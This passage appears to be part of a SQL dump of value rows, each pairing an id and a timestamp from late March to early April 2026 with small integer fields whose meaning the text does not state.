(28257, '2026-03-25 12:57:25', 1, 2059, 0, 1, 1),
(28258, '2026-03-25 12:57:26', 1, 2058, 0, 1, 1),
(28259, '2026-03-25 12:57:27', 1, 2055, 0, 1, 1),
(28260, '2026-03-25 12:57:27', 1, 2054, 0, 1, 1),
(28261, '2026-03-25 12:57:28', 1, 2059, 0, 1, 1),
(28262, '2026-03-25 12:57:28', 1, 2054, 0, 1, 1),
(28263, '2026-03-25 14:18:28', 1, 2053, 0, 1, 1),
(28264, '2026-03-25 14:19:20', 1, 2060, 0, 1, 1),
(28265, '2026-03-25 14:20:20', 1, 2054, 0, 1, 1),
(28266, '2026-03-25 14:20:22', 1, 2062, 0, 1, 1),
(28267, '2026-03-25 14:20:47', 1, 2055, 0, 1, 1),
(28268, '2026-03-25 14:21:31', 1, 2058, 0, 1, 1),
(28269, '2026-03-25 14:21:55', 1, 2058, 0, 1, 1),
(28270, '2026-03-25 14:22:23', 1, 2060, 0, 1, 1),
(28271, '2026-03-25 16:18:05', 1, 2060, 0, 1, 1),
(28272, '2026-03-25 16:18:10', 1, 2060, 0, 1, 1),
(28273, '2026-03-25 16:35:24', 1, 2062, 0, 1, 1),
(28274, '2026-03-25 16:35:52', 1, 2062, 0, 1, 1),
(28275, '2026-03-25 16:42:10', 1, 2061, 0, 1, 1),
(28276, '2026-03-25 17:08:11', 1, 2060, 0, 1, 1),
(28277, '2026-03-25 17:31:02', 1, 2053, 0, 1, 1),
(28278, '2026-03-25 17:41:20', 1, 2059, 0, 1, 1),
(28279, '2026-03-25 17:58:39', 1, 2060, 0, 1, 1),
(28280, '2026-03-25 18:22:41', 1, 2060, 0, 1, 1),
(28281, '2026-03-25 19:04:25', 1, 2061, 0, 1, 1),
(28282, '2026-03-25 20:32:15', 1, 2053, 0, 1, 1),
(28283, '2026-03-25 20:44:02', 1, 2053, 0, 1, 1),
(28284, '2026-03-25 20:46:57', 4, 2062, 0, 1, 1),
(28285, '2026-03-25 20:54:33', 4, 2062, 0, 1, 1),
(28286, '2026-03-25 22:25:37', 4, 2062, 0, 1, 1),
(28287, '2026-03-25 23:18:10', 1, 2063, 0, 1, 1),
(28288, '2026-03-26 00:59:23', 4, 2062, 0, 1, 1),
(28289, '2026-03-26 04:11:35', 4, 2062, 0, 1, 1),
(28290, '2026-03-26 04:45:55', 1, 2064, 0, 1, 1),
(28291, '2026-03-26 04:54:25', 1, 2054, 0, 1, 1),
(28292, '2026-03-26 06:09:20', 1, 2060, 0, 1, 1),
(28293, '2026-03-26 06:09:26', 1, 2060, 0, 1, 1),
(28294, '2026-03-26 06:28:42', 1, 2064, 0, 1, 1),
(28295, '2026-03-26 07:20:42', 4, 2062, 0, 1, 1),
(28296, '2026-03-26 07:22:47', 1, 2061, 0, 1, 1),
(28297, '2026-03-26 10:47:28', 1, 2053, 0, 1, 1),
(28298, '2026-03-26 11:06:32', 4, 2062, 0, 1, 1),
(28299, '2026-03-26 12:18:46', 1, 2060, 0, 1, 1),
(28300, '2026-03-26 12:59:46', 1, 2061, 0, 1, 1),
(28301, '2026-03-26 14:19:01', 1, 2059, 0, 1, 1),
(28302, '2026-03-26 14:19:12', 1, 2058, 0, 1, 1),
(28303, '2026-03-26 14:19:21', 1, 2062, 0, 1, 1),
(28304, '2026-03-26 14:23:03', 1, 2053, 0, 1, 1),
(28305, '2026-03-26 14:23:05', 1, 2054, 0, 1, 1),
(28306, '2026-03-26 14:23:06', 1, 2060, 0, 1, 1),
(28307, '2026-03-26 14:23:37', 1, 2060, 0, 1, 1),
(28308, '2026-03-26 14:23:41', 1, 2055, 0, 1, 1),
(28309, '2026-03-26 14:23:53', 1, 2060, 0, 1, 1),
(28310, '2026-03-26 15:19:44', 1, 2053, 0, 1, 1),
(28311, '2026-03-26 15:38:37', 4, 2062, 0, 1, 1),
(28312, '2026-03-26 15:41:04', 1, 2061, 0, 1, 1),
(28313, '2026-03-26 15:41:05', 1, 2061, 0, 1, 1),
(28314, '2026-03-26 16:24:07', 1, 2060, 0, 1, 1),
(28315, '2026-03-26 17:01:52', 1, 2062, 0, 1, 1),
(28316, '2026-03-26 17:02:45', 1, 2062, 0, 1, 1),
(28317, '2026-03-26 19:48:15', 1, 2061, 0, 1, 1),
(28318, '2026-03-26 19:50:01', 4, 2062, 0, 1, 1),
(28319, '2026-03-26 23:17:20', 1, 2061, 0, 1, 1),
(28320, '2026-03-26 23:26:00', 1, 2053, 0, 1, 1),
(28321, '2026-03-27 00:23:41', 4, 2062, 0, 1, 1),
(28322, '2026-03-27 00:54:01', 1, 2060, 0, 1, 1),
(28323, '2026-03-27 01:16:31', 1, 2055, 0, 1, 1),
(28324, '2026-03-27 01:33:31', 1, 2060, 0, 1, 1),
(28325, '2026-03-27 03:11:16', 1, 2053, 0, 1, 1),
(28326, '2026-03-27 05:13:20', 4, 2062, 0, 1, 1),
(28327, '2026-03-27 06:00:48', 1, 2053, 0, 1, 1),
(28328, '2026-03-27 06:15:24', 1, 2061, 0, 1, 1),
(28329, '2026-03-27 10:04:31', 4, 2062, 0, 1, 1),
(28330, '2026-03-27 11:11:34', 1, 2053, 0, 1, 1),
(28331, '2026-03-27 11:49:26', 1, 2055, 0, 1, 1),
(28332, '2026-03-27 12:29:50', 1, 2059, 0, 1, 1),
(28333, '2026-03-27 12:30:04', 1, 2064, 0, 1, 1),
(28334, '2026-03-27 12:32:37', 1, 2060, 0, 1, 1),
(28335, '2026-03-27 12:32:41', 1, 2061, 0, 1, 1),
(28336, '2026-03-27 12:33:35', 1, 2054, 0, 1, 1),
(28337, '2026-03-27 12:39:26', 1, 2058, 0, 1, 1),
(28338, '2026-03-27 12:42:15', 1, 2062, 0, 1, 1),
(28339, '2026-03-27 12:56:05', 1, 2063, 0, 1, 1),
(28340, '2026-03-27 12:57:22', 1, 2060, 0, 1, 1),
(28341, '2026-03-27 13:33:21', 1, 2060, 0, 1, 1),
(28342, '2026-03-27 13:33:52', 1, 2053, 0, 1, 1),
(28343, '2026-03-27 13:45:11', 1, 2055, 0, 1, 1),
(28344, '2026-03-27 14:17:16', 1, 2062, 0, 1, 1),
(28345, '2026-03-27 14:17:19', 1, 2060, 0, 1, 1),
(28346, '2026-03-27 14:17:21', 1, 2055, 0, 1, 1),
(28347, '2026-03-27 14:18:13', 1, 2058, 0, 1, 1),
(28348, '2026-03-27 14:18:14', 1, 2054, 0, 1, 1),
(28349, '2026-03-27 14:21:35', 1, 2060, 0, 1, 1),
(28350, '2026-03-27 15:03:06', 4, 2062, 0, 1, 1),
(28351, '2026-03-27 16:25:08', 1, 2062, 0, 1, 1),
(28352, '2026-03-27 16:25:38', 1, 2062, 0, 1, 1),
(28353, '2026-03-27 17:25:43', 1, 2061, 0, 1, 1),
(28354, '2026-03-27 17:44:30', 1, 2062, 0, 1, 1),
(28355, '2026-03-27 17:52:18', 1, 2064, 8629, 1, 1),
(28356, '2026-03-27 18:21:10', 1, 2064, 0, 1, 1),
(28357, '2026-03-27 18:21:16', 1, 2064, 0, 1, 1),
(28358, '2026-03-27 18:21:19', 1, 2064, 0, 1, 1),
(28359, '2026-03-27 18:21:22', 1, 2063, 0, 1, 1),
(28360, '2026-03-27 18:21:25', 1, 2062, 0, 1, 1),
(28361, '2026-03-27 18:21:28', 4, 2062, 0, 1, 1),
(28362, '2026-03-27 18:21:29', 4, 2062, 0, 1, 1),
(28363, '2026-03-27 18:21:31', 4, 2062, 0, 1, 1),
(28364, '2026-03-27 18:21:33', 4, 2062, 0, 1, 1),
(28365, '2026-03-27 18:21:36', 4, 2062, 0, 1, 1),
(28366, '2026-03-27 18:21:38', 4, 2062, 0, 1, 1),
(28367, '2026-03-27 18:21:40', 4, 2062, 0, 1, 1),
(28368, '2026-03-27 18:42:37', 1, 2053, 0, 1, 1),
(28369, '2026-03-27 19:48:02', 1, 2064, 0, 1, 1),
(28370, '2026-03-27 20:11:36', 4, 2062, 0, 1, 1),
(28371, '2026-03-27 20:28:30', 1, 2061, 0, 1, 1),
(28372, '2026-03-27 21:51:58', 1, 2054, 0, 1, 1),
(28373, '2026-03-27 22:54:31', 1, 2061, 0, 1, 1),
(28374, '2026-03-27 22:54:35', 1, 2063, 0, 1, 1),
(28375, '2026-03-27 22:54:39', 1, 2062, 0, 1, 1),
(28376, '2026-03-28 01:12:20', 4, 2062, 0, 1, 1),
(28377, '2026-03-28 01:59:18', 1, 2053, 0, 1, 1),
(28378, '2026-03-28 02:37:26', 1, 2053, 0, 1, 1),
(28379, '2026-03-28 04:47:33', 1, 2060, 0, 1, 1),
(28380, '2026-03-28 06:16:22', 1, 2064, 0, 1, 1),
(28381, '2026-03-28 06:26:49', 4, 2062, 0, 1, 1),
(28382, '2026-03-28 06:29:34', 1, 2063, 0, 1, 1),
(28383, '2026-03-28 06:36:18', 1, 2060, 0, 1, 1),
(28384, '2026-03-28 06:36:22', 1, 2059, 0, 1, 1),
(28385, '2026-03-28 08:05:32', 1, 2061, 0, 1, 1),
(28386, '2026-03-28 08:39:54', 1, 2058, 0, 1, 1),
(28387, '2026-03-28 08:40:01', 1, 2053, 0, 1, 1),
(28388, '2026-03-28 09:02:55', 1, 2064, 8642, 1, 1),
(28389, '2026-03-28 11:47:24', 4, 2062, 0, 1, 1),
(28390, '2026-03-28 11:50:19', 1, 2062, 0, 1, 1),
(28391, '2026-03-28 12:43:09', 1, 2062, 0, 1, 1),
(28392, '2026-03-28 13:44:42', 1, 2053, 0, 1, 1),
(28393, '2026-03-28 13:54:55', 1, 2061, 0, 1, 1),
(28394, '2026-03-28 14:03:45', 1, 2060, 0, 1, 1),
(28395, '2026-03-28 14:18:51', 1, 2062, 0, 1, 1),
(28396, '2026-03-28 14:19:12', 1, 2062, 0, 1, 1),
(28397, '2026-03-28 14:19:24', 1, 2060, 0, 1, 1),
(28398, '2026-03-28 14:20:09', 1, 2060, 0, 1, 1),
(28399, '2026-03-28 14:21:06', 1, 2061, 0, 1, 1),
(28400, '2026-03-28 14:23:00', 1, 2055, 0, 1, 1),
(28401, '2026-03-28 14:23:02', 1, 2058, 0, 1, 1),
(28402, '2026-03-28 14:23:04', 1, 2054, 0, 1, 1),
(28403, '2026-03-28 15:40:58', 1, 2064, 0, 1, 1),
(28404, '2026-03-28 15:41:01', 1, 2064, 0, 1, 1),
(28405, '2026-03-28 15:41:04', 1, 2064, 0, 1, 1),
(28406, '2026-03-28 15:41:07', 1, 2063, 0, 1, 1),
(28407, '2026-03-28 15:41:10', 1, 2062, 0, 1, 1),
(28408, '2026-03-28 15:41:13', 4, 2062, 0, 1, 1),
(28409, '2026-03-28 15:41:14', 4, 2062, 0, 1, 1),
(28410, '2026-03-28 15:41:17', 4, 2062, 0, 1, 1),
(28411, '2026-03-28 15:41:19', 4, 2062, 0, 1, 1),
(28412, '2026-03-28 15:41:22', 4, 2062, 0, 1, 1),
(28413, '2026-03-28 15:41:25', 4, 2062, 0, 1, 1),
(28414, '2026-03-28 15:41:27', 4, 2062, 0, 1, 1),
(28415, '2026-03-28 16:41:20', 1, 2061, 0, 1, 1),
(28416, '2026-03-28 16:52:16', 1, 2058, 0, 1, 1),
(28417, '2026-03-28 17:03:11', 1, 2055, 0, 1, 1),
(28418, '2026-03-28 17:11:32', 1, 2054, 0, 1, 1),
(28419, '2026-03-28 17:32:18', 1, 2061, 0, 1, 1),
(28420, '2026-03-28 17:45:32', 4, 2062, 0, 1, 1),
(28421, '2026-03-28 18:41:32', 1, 2062, 0, 1, 1),
(28422, '2026-03-28 18:55:36', 1, 2062, 0, 1, 1),
(28423, '2026-03-28 18:56:12', 1, 2062, 0, 1, 1),
(28424, '2026-03-28 20:45:16', 1, 2058, 0, 1, 1),
(28425, '2026-03-28 20:53:58', 1, 2061, 0, 1, 1),
(28426, '2026-03-28 21:02:29', 1, 2062, 0, 1, 1),
(28427, '2026-03-28 21:03:00', 1, 2062, 0, 1, 1),
(28428, '2026-03-28 21:36:34', 1, 2061, 0, 1, 1),
(28429, '2026-03-28 21:36:45', 1, 2061, 0, 1, 1),
(28430, '2026-03-28 22:51:45', 1, 2064, 0, 1, 1),
(28431, '2026-03-28 23:00:10', 1, 2060, 0, 1, 1),
(28432, '2026-03-28 23:09:02', 1, 2059, 0, 1, 1),
(28433, '2026-03-28 23:25:43', 1, 2054, 0, 1, 1),
(28434, '2026-03-28 23:50:11', 4, 2062, 0, 1, 1),
(28435, '2026-03-29 01:15:55', 1, 2062, 0, 1, 1),
(28436, '2026-03-29 01:57:21', 1, 2053, 0, 1, 1),
(28437, '2026-03-29 03:04:00', 1, 2060, 0, 1, 1),
(28438, '2026-03-29 03:07:07', 1, 2058, 0, 1, 1),
(28439, '2026-03-29 03:50:48', 1, 2060, 0, 1, 1),
(28440, '2026-03-29 04:26:39', 1, 2061, 0, 1, 1),
(28441, '2026-03-29 05:14:27', 1, 2053, 0, 1, 1),
(28442, '2026-03-29 05:18:14', 1, 2061, 0, 1, 1),
(28443, '2026-03-29 05:22:04', 4, 2062, 0, 1, 1),
(28444, '2026-03-29 08:40:37', 1, 2061, 0, 1, 1),
(28445, '2026-03-29 08:56:26', 1, 2060, 0, 1, 1),
(28446, '2026-03-29 11:17:11', 4, 2062, 0, 1, 1),
(28447, '2026-03-29 11:42:02', 4, 2055, 0, 1, 1),
(28448, '2026-03-29 11:42:07', 4, 2055, 0, 1, 1),
(28449, '2026-03-29 11:42:13', 4, 2055, 0, 1, 1),
(28450, '2026-03-29 11:42:18', 4, 2055, 0, 1, 1),
(28451, '2026-03-29 11:42:23', 4, 2055, 0, 1, 1),
(28452, '2026-03-29 11:42:28', 4, 2055, 0, 1, 1),
(28453, '2026-03-29 12:42:14', 1, 2054, 0, 1, 1),
(28454, '2026-03-29 13:13:57', 1, 2053, 0, 1, 1),
(28455, '2026-03-29 14:17:44', 1, 2061, 0, 1, 1),
(28456, '2026-03-29 14:18:34', 1, 2060, 0, 1, 1),
(28457, '2026-03-29 14:19:37', 1, 2058, 0, 1, 1),
(28458, '2026-03-29 14:20:12', 1, 2060, 0, 1, 1),
(28459, '2026-03-29 14:21:29', 1, 2054, 0, 1, 1),
(28460, '2026-03-29 14:22:17', 1, 2055, 0, 1, 1),
(28461, '2026-03-29 16:14:39', 1, 2061, 0, 1, 1),
(28462, '2026-03-29 16:49:05', 1, 2060, 0, 1, 1),
(28463, '2026-03-29 16:58:36', 1, 2063, 0, 1, 1),
(28464, '2026-03-29 17:40:48', 1, 2059, 0, 1, 1),
(28465, '2026-03-29 18:29:34', 4, 2062, 0, 1, 1),
(28466, '2026-03-29 18:39:02', 1, 2053, 0, 1, 1),
(28467, '2026-03-29 20:35:32', 4, 2055, 0, 1, 1),
(28468, '2026-03-29 20:35:37', 4, 2055, 0, 1, 1),
(28469, '2026-03-29 20:35:42', 4, 2055, 0, 1, 1),
(28470, '2026-03-29 20:35:47', 4, 2055, 0, 1, 1),
(28471, '2026-03-29 20:35:52', 4, 2055, 0, 1, 1),
(28472, '2026-03-29 20:35:57', 4, 2055, 0, 1, 1),
(28473, '2026-03-29 21:25:16', 4, 2055, 0, 1, 1),
(28474, '2026-03-29 21:25:21', 4, 2055, 0, 1, 1),
(28475, '2026-03-29 21:25:27', 4, 2055, 0, 1, 1),
(28476, '2026-03-29 21:25:32', 4, 2055, 0, 1, 1),
(28477, '2026-03-29 21:25:36', 4, 2055, 0, 1, 1),
(28478, '2026-03-29 21:25:41', 4, 2055, 0, 1, 1),
(28479, '2026-03-29 23:29:42', 1, 2053, 0, 1, 1),
(28480, '2026-03-30 00:03:11', 1, 2060, 0, 1, 1),
(28481, '2026-03-30 01:09:34', 4, 2062, 0, 1, 1),
(28482, '2026-03-30 02:02:38', 1, 2062, 0, 1, 1),
(28483, '2026-03-30 02:59:57', 1, 2061, 0, 1, 1),
(28484, '2026-03-30 05:50:55', 1, 2053, 0, 1, 1),
(28485, '2026-03-30 06:42:50', 4, 2062, 0, 1, 1),
(28486, '2026-03-30 07:08:02', 1, 2061, 0, 1, 1),
(28487, '2026-03-30 07:53:15', 1, 2060, 0, 1, 1),
(28488, '2026-03-30 09:23:15', 1, 2061, 0, 1, 1),
(28489, '2026-03-30 09:42:58', 4, 2059, 0, 1, 1),
(28490, '2026-03-30 09:57:51', 1, 2055, 0, 1, 1),
(28491, '2026-03-30 10:40:32', 1, 2061, 0, 1, 1),
(28492, '2026-03-30 11:06:50', 1, 2063, 0, 1, 1),
(28493, '2026-03-30 11:08:41', 1, 2053, 0, 1, 1),
(28494, '2026-03-30 12:37:23', 4, 2062, 0, 1, 1),
(28495, '2026-03-30 14:21:12', 1, 2062, 0, 1, 1),
(28496, '2026-03-30 14:22:25', 1, 2064, 0, 1, 1),
(28497, '2026-03-30 14:22:33', 1, 2060, 0, 1, 1),
(28498, '2026-03-30 14:22:34', 1, 2060, 0, 1, 1),
(28499, '2026-03-30 14:23:10', 1, 2054, 0, 1, 1),
(28500, '2026-03-30 14:23:26', 1, 2058, 0, 1, 1),
(28501, '2026-03-30 14:24:39', 1, 2055, 0, 1, 1),
(28502, '2026-03-30 15:18:09', 1, 2053, 0, 1, 1),
(28503, '2026-03-30 16:12:58', 1, 2061, 0, 1, 1),
(28504, '2026-03-30 16:48:47', 1, 2060, 0, 1, 1),
(28505, '2026-03-30 17:23:48', 1, 2054, 0, 1, 1),
(28506, '2026-03-30 17:35:53', 1, 2062, 0, 1, 1),
(28507, '2026-03-30 17:36:57', 1, 2062, 0, 1, 1),
(28508, '2026-03-30 17:38:16', 1, 2064, 0, 1, 1),
(28509, '2026-03-30 18:08:47', 1, 2060, 0, 1, 1),
(28510, '2026-03-30 18:31:48', 4, 2062, 0, 1, 1),
(28511, '2026-03-30 18:55:14', 1, 2060, 0, 1, 1),
(28512, '2026-03-30 20:52:16', 1, 2064, 0, 1, 1),
(28513, '2026-03-30 21:43:22', 1, 2053, 0, 1, 1),
(28514, '2026-03-31 00:14:18', 4, 2062, 0, 1, 1),
(28515, '2026-03-31 00:47:00', 1, 2060, 0, 1, 1),
(28516, '2026-03-31 04:05:15', 1, 2063, 0, 1, 1),
(28517, '2026-03-31 05:39:53', 1, 2061, 0, 1, 1),
(28518, '2026-03-31 06:01:51', 4, 2062, 0, 1, 1),
(28519, '2026-03-31 08:05:46', 1, 2064, 0, 1, 1),
(28520, '2026-03-31 08:05:50', 1, 2063, 0, 1, 1),
(28521, '2026-03-31 08:05:52', 1, 2062, 0, 1, 1),
(28522, '2026-03-31 08:05:54', 1, 2061, 0, 1, 1),
(28523, '2026-03-31 08:05:56', 1, 2060, 0, 1, 1),
(28524, '2026-03-31 08:05:58', 1, 2064, 0, 1, 1),
(28525, '2026-03-31 08:06:01', 1, 2064, 0, 1, 1),
(28526, '2026-03-31 11:45:03', 1, 2060, 0, 1, 1),
(28527, '2026-03-31 12:05:35', 4, 2062, 0, 1, 1),
(28528, '2026-03-31 13:27:43', 1, 2064, 0, 1, 1),
(28529, '2026-03-31 13:51:02', 1, 2060, 0, 1, 1),
(28530, '2026-03-31 14:19:32', 1, 2064, 0, 1, 1),
(28531, '2026-03-31 14:20:49', 1, 2058, 0, 1, 1),
(28532, '2026-03-31 14:20:52', 1, 2060, 0, 1, 1),
(28533, '2026-03-31 14:21:07', 1, 2061, 0, 1, 1),
(28534, '2026-03-31 14:21:15', 1, 2060, 0, 1, 1),
(28535, '2026-03-31 14:21:34', 1, 2061, 0, 1, 1),
(28536, '2026-03-31 14:21:49', 1, 2055, 0, 1, 1),
(28537, '2026-03-31 14:23:18', 1, 2054, 0, 1, 1),
(28538, '2026-03-31 16:58:08', 1, 2062, 0, 1, 1),
(28539, '2026-03-31 16:58:33', 1, 2062, 0, 1, 1),
(28540, '2026-03-31 17:25:46', 1, 2055, 0, 1, 1),
(28541, '2026-03-31 17:49:29', 1, 2062, 0, 1, 1),
(28542, '2026-03-31 17:49:53', 1, 2062, 0, 1, 1),
(28543, '2026-03-31 18:10:17', 4, 2062, 0, 1, 1),
(28544, '2026-03-31 18:28:59', 4, 2055, 0, 1, 1),
(28545, '2026-03-31 18:29:04', 4, 2055, 0, 1, 1),
(28546, '2026-03-31 18:29:09', 4, 2055, 0, 1, 1),
(28547, '2026-03-31 18:29:14', 4, 2055, 0, 1, 1),
(28548, '2026-03-31 18:29:20', 4, 2055, 0, 1, 1),
(28549, '2026-03-31 18:29:25', 4, 2055, 0, 1, 1),
(28550, '2026-03-31 18:38:08', 1, 2059, 0, 1, 1),
(28551, '2026-03-31 19:43:48', 1, 2061, 0, 1, 1),
(28552, '2026-03-31 20:23:51', 1, 2061, 0, 1, 1),
(28553, '2026-03-31 21:04:58', 1, 2054, 0, 1, 1),
(28554, '2026-04-01 00:03:19', 4, 2062, 0, 1, 1),
(28555, '2026-04-01 00:05:22', 1, 2054, 0, 1, 1),
(28556, '2026-04-01 01:17:41', 1, 2061, 0, 1, 1),
(28557, '2026-04-01 02:23:52', 1, 2061, 0, 1, 1),
(28558, '2026-04-01 02:35:18', 1, 2061, 0, 1, 1),
(28559, '2026-04-01 02:38:55', 1, 2061, 0, 1, 1),
(28560, '2026-04-01 02:43:44', 1, 2060, 0, 1, 1),
(28561, '2026-04-01 03:08:23', 1, 2064, 0, 1, 1),
(28562, '2026-04-01 04:33:37', 1, 2064, 0, 1, 1),
(28563, '2026-04-01 04:53:49', 1, 2062, 0, 1, 1),
(28564, '2026-04-01 06:05:48', 4, 2062, 0, 1, 1),
(28565, '2026-04-01 07:32:22', 1, 2058, 0, 1, 1),
(28566, '2026-04-01 10:42:43', 1, 2054, 0, 1, 1),
(28567, '2026-04-01 11:03:02', 1, 2054, 0, 1, 1),
(28568, '2026-04-01 12:36:57', 4, 2062, 0, 1, 1),
(28569, '2026-04-01 12:55:27', 4, 2055, 0, 1, 1),
(28570, '2026-04-01 12:55:32', 4, 2055, 0, 1, 1),
(28571, '2026-04-01 12:55:37', 4, 2055, 0, 1, 1),
(28572, '2026-04-01 12:55:43', 4, 2055, 0, 1, 1),
(28573, '2026-04-01 12:55:48', 4, 2055, 0, 1, 1),
(28574, '2026-04-01 12:55:53', 4, 2055, 0, 1, 1),
(28575, '2026-04-01 13:57:02', 1, 2063, 0, 1, 1),
(28576, '2026-04-01 14:07:20', 1, 2061, 0, 1, 1),
(28577, '2026-04-01 14:16:22', 1, 2062, 0, 1, 1),
(28578, '2026-04-01 14:19:22', 1, 2054, 0, 1, 1),
(28579, '2026-04-01 14:19:30', 1, 2055, 0, 1, 1),
(28580, '2026-04-01 14:20:04', 1, 2061, 0, 1, 1),
(28581, '2026-04-01 14:21:33', 1, 2058, 0, 1, 1),
(28582, '2026-04-01 14:22:31', 1, 2060, 0, 1, 1),
(28583, '2026-04-01 14:22:36', 1, 2063, 0, 1, 1),
(28584, '2026-04-01 14:26:30', 4, 2059, 0, 1, 1),
(28585, '2026-04-01 15:08:25', 1, 2061, 0, 1, 1),
(28586, '2026-04-01 16:45:01', 1, 2062, 0, 1, 1),
(28587, '2026-04-01 16:45:51', 1, 2062, 0, 1, 1),
(28588, '2026-04-01 17:43:10', 1, 2059, 0, 1, 1),
(28589, '2026-04-01 18:39:05', 1, 2064, 0, 1, 1),
(28590, '2026-04-01 18:47:25', 1, 2058, 0, 1, 1),
(28591, '2026-04-01 18:50:59', 4, 2062, 0, 1, 1),
(28592, '2026-04-01 19:07:55', 1, 2054, 0, 1, 1),
(28593, '2026-04-01 19:17:36', 1, 2064, 0, 1, 1),
(28594, '2026-04-01 19:39:40', 1, 2060, 0, 1, 1),
(28595, '2026-04-01 20:18:14', 1, 2059, 0, 1, 1),
(28596, '2026-04-01 20:38:30', 1, 2060, 0, 1, 1),
(28597, '2026-04-01 22:48:50', 1, 2060, 0, 1, 1),
(28598, '2026-04-01 22:48:53', 1, 2060, 0, 1, 1),
(28599, '2026-04-02 00:15:58', 1, 2055, 0, 1, 1),
(28600, '2026-04-02 00:53:12', 4, 2062, 0, 1, 1),
(28601, '2026-04-02 01:02:03', 4, 2059, 0, 1, 1),
(28602, '2026-04-02 01:15:19', 1, 2055, 0, 1, 1),
(28603, '2026-04-02 05:06:12', 1, 2064, 0, 1, 1),
(28604, '2026-04-02 06:42:01', 1, 2064, 0, 1, 1),
(28605, '2026-04-02 06:42:11', 1, 2055, 0, 1, 1),
(28606, '2026-04-02 06:44:19', 1, 2054, 0, 1, 1),
(28607, '2026-04-02 06:45:39', 1, 2063, 0, 1, 1),
(28608, '2026-04-02 06:49:52', 1, 2059, 0, 1, 1),
(28609, '2026-04-02 06:55:38', 1, 2060, 0, 1, 1),
(28610, '2026-04-02 07:06:35', 4, 2062, 0, 1, 1),
(28611, '2026-04-02 07:15:21', 1, 2062, 0, 1, 1),
(28612, '2026-04-02 07:19:02', 1, 2061, 0, 1, 1),
(28613, '2026-04-02 07:26:59', 1, 2058, 0, 1, 1),
(28614, '2026-04-02 08:39:09', 1, 2061, 0, 1, 1),
(28615, '2026-04-02 08:47:45', 1, 2053, 0, 1, 1),
(28616, '2026-04-02 09:30:25', 1, 2060, 0, 1, 1),
(28617, '2026-04-02 10:29:43', 1, 2054, 0, 1, 1),
(28618, '2026-04-02 13:31:23', 4, 2062, 0, 1, 1),
(28619, '2026-04-02 14:14:30', 1, 2060, 0, 1, 1),
(28620, '2026-04-02 14:18:32', 1, 2060, 0, 1, 1),
(28621, '2026-04-02 14:19:36', 1, 2062, 0, 1, 1),
(28622, '2026-04-02 14:20:36', 1, 2060, 0, 1, 1),
(28623, '2026-04-02 14:20:38', 1, 2064, 0, 1, 1),
(28624, '2026-04-02 14:20:39', 1, 2063, 0, 1, 1),
(28625, '2026-04-02 14:20:41', 1, 2058, 0, 1, 1),
(28626, '2026-04-02 14:20:42', 1, 2061, 0, 1, 1),
(28627, '2026-04-02 14:20:43', 1, 2059, 0, 1, 1),
(28628, '2026-04-02 14:20:44', 1, 2053, 0, 1, 1),
(28629, '2026-04-02 14:20:46', 1, 2062, 0, 1, 1),
(28630, '2026-04-02 14:20:48', 1, 2054, 0, 1, 1),
(28631, '2026-04-02 14:20:51', 1, 2055, 0, 1, 1),
(28632, '2026-04-02 14:21:45', 1, 2060, 0, 1, 1),
(28633, '2026-04-02 14:21:51', 1, 2054, 0, 1, 1),
(28634, '2026-04-02 14:23:06', 1, 2058, 0, 1, 1),
(28635, '2026-04-02 16:47:42', 1, 2061, 0, 1, 1),
(28636, '2026-04-02 16:59:57', 1, 2062, 0, 1, 1),
(28637, '2026-04-02 17:00:20', 1, 2062, 0, 1, 1),
(28638, '2026-04-02 19:56:20', 4, 2062, 0, 1, 1),
(28639, '2026-04-02 22:39:04', 1, 2055, 0, 1, 1),
(28640, '2026-04-03 00:29:49', 1, 2060, 0, 1, 1),
(28641, '2026-04-03 00:29:54', 1, 2060, 0, 1, 1),
(28642, '2026-04-03 01:49:21', 4, 2062, 0, 1, 1),
(28643, '2026-04-03 07:24:53', 1, 2060, 0, 1, 1),
(28644, '2026-04-03 07:49:06', 4, 2062, 0, 1, 1),
(28645, '2026-04-03 08:07:58', 1, 2059, 0, 1, 1),
(28646, '2026-04-03 10:31:43', 1, 2055, 0, 1, 1),
(28647, '2026-04-03 11:08:21', 1, 2062, 0, 1, 1),
(28648, '2026-04-03 11:49:10', 1, 2055, 0, 1, 1),
(28649, '2026-04-03 13:59:52', 4, 2062, 0, 1, 1),
(28650, '2026-04-03 14:23:26', 1, 2060, 0, 1, 1),
(28651, '2026-04-03 14:23:54', 1, 2064, 0, 1, 1),
(28652, '2026-04-03 14:23:55', 1, 2060, 0, 1, 1),
(28653, '2026-04-03 14:24:03', 1, 2061, 0, 1, 1),
(28654, '2026-04-03 14:24:53', 1, 2054, 0, 1, 1),
(28655, '2026-04-03 14:25:24', 1, 2062, 0, 1, 1),
(28656, '2026-04-03 14:25:59', 1, 2055, 0, 1, 1),
(28657, '2026-04-03 14:26:03', 1, 2058, 0, 1, 1),
(28658, '2026-04-03 14:26:20', 1, 2058, 0, 1, 1),
(28659, '2026-04-03 15:02:08', 1, 2061, 0, 1, 1),
(28660, '2026-04-03 16:53:18', 1, 2062, 0, 1, 1),
(28661, '2026-04-03 16:54:01', 1, 2062, 0, 1, 1),
(28662, '2026-04-03 17:33:29', 4, 2059, 0, 1, 1),
(28663, '2026-04-03 19:52:59', 1, 2061, 0, 1, 1),
(28664, '2026-04-03 20:05:58', 4, 2062, 0, 1, 1),
(28665, '2026-04-03 20:51:03', 1, 2060, 0, 1, 1),
(28666, '2026-04-03 21:41:10', 1, 2054, 0, 1, 1),
(28667, '2026-04-03 22:42:40', 1, 2060, 0, 1, 1),
(28668, '2026-04-04 01:47:22', 1, 2053, 0, 1, 1),
(28669, '2026-04-04 02:03:50', 1, 2054, 0, 1, 1),
(28670, '2026-04-04 02:23:38', 4, 2062, 0, 1, 1),
(28671, '2026-04-04 03:15:29', 1, 2054, 0, 1, 1),
(28672, '2026-04-04 04:05:48', 4, 2059, 0, 1, 1),
(28673, '2026-04-04 04:31:54', 1, 2064, 0, 1, 1),
(28674, '2026-04-04 05:49:10', 1, 2054, 0, 1, 1),
(28675, '2026-04-04 05:49:12', 4, 2054, 0, 1, 1),
(28676, '2026-04-04 07:00:27', 1, 2059, 0, 1, 1),
(28677, '2026-04-04 07:00:30', 1, 2060, 0, 1, 1),
(28678, '2026-04-04 08:27:02', 4, 2062, 0, 1, 1),
(28679, '2026-04-04 08:48:10', 1, 2058, 0, 1, 1),
(28680, '2026-04-04 08:48:14', 1, 2053, 0, 1, 1),
(28681, '2026-04-04 08:53:22', 1, 2059, 0, 1, 1),
(28682, '2026-04-04 10:36:56', 1, 2055, 0, 1, 1),
(28683, '2026-04-04 11:51:18', 1, 2063, 0, 1, 1),
(28684, '2026-04-04 11:52:19', 1, 2063, 0, 1, 1),
